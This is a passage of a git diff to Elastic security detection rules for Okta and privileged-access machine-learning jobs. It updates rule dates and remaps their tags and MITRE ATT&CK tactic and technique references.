+reference = "https://attack.mitre.org/techniques/T1556/006/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
diff --git a/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml b/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml
index b85da21efcb..24d114ed045 100644
--- a/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml
+++ b/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/07/01"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -70,12 +70,7 @@ references = [
 risk_score = 47
 rule_id = "cd16fb10-0261-46e8-9932-a0336278cdbe"
 severity = "medium"
-tags = [
- "Tactic: Persistence",
- "Use Case: Identity and Access Audit",
- "Data Source: Okta",
- "Resources: Investigation Guide",
-]
+tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -86,14 +81,18 @@ event.dataset:okta.system and event.action:(application.policy.sign_on.update or
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1556"
 name = "Modify Authentication Process"
 reference = "https://attack.mitre.org/techniques/T1556/"
+[[rule.threat.technique.subtechnique]]
+id = "T1556.009"
+name = "Conditional Access Policies"
+reference = "https://attack.mitre.org/techniques/T1556/009/"
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml b/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml
index b0edb92b585..22ef2ee2fc5 100644
--- a/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml
+++ b/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/11/09"
 integration = ["endpoint", "okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -65,16 +65,7 @@ references = [
 risk_score = 73
 rule_id = "5610b192-7f18-11ee-825b-f661ea17fbcd"
 severity = "high"
-tags = [
- "Tactic: Persistence",
- "Use Case: Identity and Access Audit",
- "Data Source: Okta",
- "Data Source: Elastic Defend",
- "Rule Type: Higher-Order Rule",
- "Domain: Endpoint",
- "Domain: Cloud",
- "Resources: Investigation Guide",
-]
+tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Okta", "Data Source: Elastic Defend", "Rule Type: Higher-Order Rule", "Domain: Endpoint", "Domain: Cloud", "Resources: Investigation Guide"]
 type = "eql"
 query = '''
@@ -87,19 +78,36 @@ sequence by user.name with maxspan=12h
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1556"
 name = "Modify Authentication Process"
 reference = "https://attack.mitre.org/techniques/T1556/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1556.006"
 name = "Multi-Factor Authentication"
 reference = "https://attack.mitre.org/techniques/T1556/006/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml b/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml
index 95c5b7cbd46..fa9852ed253 100644
--- a/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml
+++ b/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "endpoint", "sysmon_linux"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -89,14 +89,13 @@ tags = [
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml b/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml
index cea8bce82f4..8147cfbf1d0 100644
--- a/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml
+++ b/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "endpoint", "sysmon_linux"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -80,24 +80,22 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = [
-    "Use Case: Privileged Access Detection",
-    "Rule Type: ML",
-    "Rule Type: Machine Learning",
-    "Tactic: Privilege Escalation",
-    "Resources: Investigation Guide",
-]
+tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Defense Evasion", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+id = "T1027"
+name = "Obfuscated Files or Information"
+reference = "https://attack.mitre.org/techniques/T1027/"
+[[rule.threat.technique.subtechnique]]
+id = "T1027.010"
+name = "Command Obfuscation"
+reference = "https://attack.mitre.org/techniques/T1027/010/"
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml b/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml
index c25efcf1291..0640fa21d56 100644
--- a/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml
+++ b/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "endpoint", "sysmon_linux"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -88,14 +88,13 @@ tags = [
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml
index 225018502ae..35c3392fc78 100644
--- a/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml
+++ b/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -79,29 +79,30 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = [
-    "Use Case: Privileged Access Detection",
-    "Rule Type: ML",
-    "Rule Type: Machine Learning",
-    "Tactic: Privilege Escalation",
-    "Resources: Investigation Guide",
-]
+tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Defense Evasion", "Tactic: Persistence", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
-
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml
index 1387bf22786..d3c4657a878 100644
--- a/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml
+++ b/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -89,14 +89,18 @@ tags = [
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml
index f79d485a9c4..54b379a95e8 100644
--- a/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml
+++ b/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -89,14 +89,18 @@ tags = [
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml
index 938ae0eef73..7783473fcb2 100644
--- a/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml
+++ b/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -78,24 +78,22 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = [
-    "Use Case: Privileged Access Detection",
-    "Rule Type: ML",
-    "Rule Type: Machine Learning",
-    "Tactic: Privilege Escalation",
-    "Resources: Investigation Guide",
-]
+tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Initial Access", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml
index f84ac248bfd..be3e4999263 100644
--- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml
+++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -78,34 +78,30 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = [
-    "Use Case: Privileged Access Detection",
-    "Rule Type: ML",
-    "Rule Type: Machine Learning",
-    "Tactic: Privilege Escalation",
-    "Resources: Investigation Guide",
-]
+tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml
index 14c6f23bdb1..6d695a94ca5 100644
--- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml
+++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -78,29 +78,30 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = [
-    "Use Case: Privileged Access Detection",
-    "Rule Type: ML",
-    "Rule Type: Machine Learning",
-    "Tactic: Privilege Escalation",
-    "Resources: Investigation Guide",
-]
+tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml
index abd5652b01f..819783e4e86 100644
--- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml
+++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_membership_changes.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -78,29 +78,30 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = [
-    "Use Case: Privileged Access Detection",
-    "Rule Type: ML",
-    "Rule Type: Machine Learning",
-    "Tactic: Privilege Escalation",
-    "Resources: Investigation Guide",
-]
+tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml
index 51b64715dc1..7af93c7e7f8 100644
--- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml
+++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_privilege_changes.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -78,34 +78,30 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = [
-    "Use Case: Privileged Access Detection",
-    "Rule Type: ML",
-    "Rule Type: Machine Learning",
-    "Tactic: Privilege Escalation",
-    "Resources: Investigation Guide",
-]
+tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml
index 6a80f4a7bd4..419a525d378 100644
--- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml
+++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_user_lifecycle_management_changes.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "okta"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -77,29 +77,30 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = [
-    "Use Case: Privileged Access Detection",
-    "Rule Type: ML",
-    "Rule Type: Machine Learning",
-    "Tactic: Privilege Escalation",
-    "Resources: Investigation Guide",
-]
+tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml
index bf61284eae9..475bbf0e183 100644
--- a/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml
+++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_group_management_events.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -80,29 +80,40 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = [
-    "Use Case: Privileged Access Detection",
-    "Rule Type: ML",
-    "Rule Type: Machine Learning",
-    "Tactic: Privilege Escalation",
-    "Resources: Investigation Guide",
-]
+tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.007"
+name = "Additional Local or Domain Groups"
+reference = "https://attack.mitre.org/techniques/T1098/007/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique.subtechnique]]
+id = "T1098.007"
+name = "Additional Local or Domain Groups"
+reference = "https://attack.mitre.org/techniques/T1098/007/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml
index d287e6828b1..43ae8f19544 100644
--- a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml
+++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_logon_events.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -87,19 +87,13 @@ tags = [
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
-
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml
index 581372213fe..f0865772d82 100644
--- a/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml
+++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_special_privilege_use_events.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -89,19 +89,8 @@ tags = [
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
-
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml b/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml
index ece76dfc05e..d58878658ee 100644
--- a/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml
+++ b/rules/integrations/pad/privileged_access_ml_windows_high_count_user_account_management_events.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -79,29 +79,35 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = [
-    "Use Case: Privileged Access Detection",
-    "Rule Type: ML",
-    "Rule Type: Machine Learning",
-    "Tactic: Privilege Escalation",
-    "Resources: Investigation Guide",
-]
+tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
+id = "T1098"
